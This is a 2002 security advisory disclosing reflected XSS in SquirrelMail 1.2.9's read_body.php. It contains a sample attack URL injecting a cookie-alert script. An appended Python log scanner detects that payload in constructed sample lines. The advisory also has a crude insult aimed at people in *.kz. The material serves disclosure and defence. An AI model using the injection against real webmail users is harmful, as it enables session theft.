SquirrelMail v1.2.9 XSS bugs

From: euronymous (just-a-userat_private)
Date: Mon Dec 02 2002 - 20:28:14 PST


    =:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
    topic: SquirrelMail v1.2.9 XSS bugs
    product: SquirrelMail v1.2.9
    vendor: www.squirrelmail.org
    risk: low
    date: 12/3/2k2
    discovered by: euronymous /F0KP /HACKRU Team
    advisory url: http://f0kp.iplus.ru/bz/008.txt 
    =:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
    	      
    description
    -----------
    when reading some email you can insert scripting code..
    read_body.php doesn't filter user input in the `mailbox' and
    `passed_id' variables. btw, v1.2.10 was released today. i don't
    know if this version contains this xss.
    
    sample attack
    -------------
    http://hostname/src/read_body.php?mailbox=
    %3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&passed_id=
    %3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&
    startMessage=1&show_more=0
    
    [it must be in a single string]
    
    a non-URL-encoded string also works fine.
    
    shouts: HACKRU Team, DWC, DHG, Spoofed Packet, all 
    russian security guyz!! 
    fuck_off: slavomira and other dirty ppl in *.kz
    
    ================
    im not a lame,
    not yet a hacker
    ================
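
Added example, not part of the original advisory or of SquirrelMail's code: a log check that flags requests to read_body.php whose `mailbox` or `passed_id` values carry markup, covering both the URL-encoded and the raw form the advisory mentions. It assumes combined-format access logs and that a legitimate `passed_id` is a plain numeric message id; the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Dec/2002:10:00:01 -0800] "GET /src/read_body.php?mailbox=INBOX&passed_id=42&startMessage=1&show_more=0 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [03/Dec/2002:10:00:07 -0800] "GET /src/read_body.php?mailbox=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&passed_id=7&startMessage=1&show_more=0 HTTP/1.1" 200 5301',
    '192.0.2.12 - - [03/Dec/2002:10:00:09 -0800] "GET /src/read_body.php?mailbox=INBOX&passed_id=<script>alert(document.cookie)</script>&startMessage=1 HTTP/1.1" 200 5290',
    '192.0.2.13 - - [03/Dec/2002:10:00:15 -0800] "GET /src/right_main.php?mailbox=INBOX HTTP/1.1" 200 2048',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
MARKUP_RE = re.compile(r'[<>"\']')  # characters that can break out into HTML


def suspicious_params(log_line):
    """Return the read_body.php parameters in this request that look like injection."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if not url.path.endswith("/read_body.php"):
        return []
    # parse_qs percent-decodes values, so encoded and raw payloads look the same here.
    params = parse_qs(url.query, keep_blank_values=True)
    hits = []
    if any(MARKUP_RE.search(v) for v in params.get("mailbox", [])):
        hits.append("mailbox")
    # Assumption: a legitimate passed_id is a numeric message id.
    if any(not v.isdigit() for v in params.get("passed_id", [])):
        hits.append("passed_id")
    return hits


def scan(lines):
    """Return (line_index, flagged_parameters) for every suspicious request."""
    results = []
    for index, line in enumerate(lines):
        hits = suspicious_params(line)
        if hits:
            results.append((index, hits))
    return results


if __name__ == "__main__":
    for index, hits in scan(SAMPLE_LOG):
        print(f"line {index}: suspicious {', '.join(hits)}")
```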
    


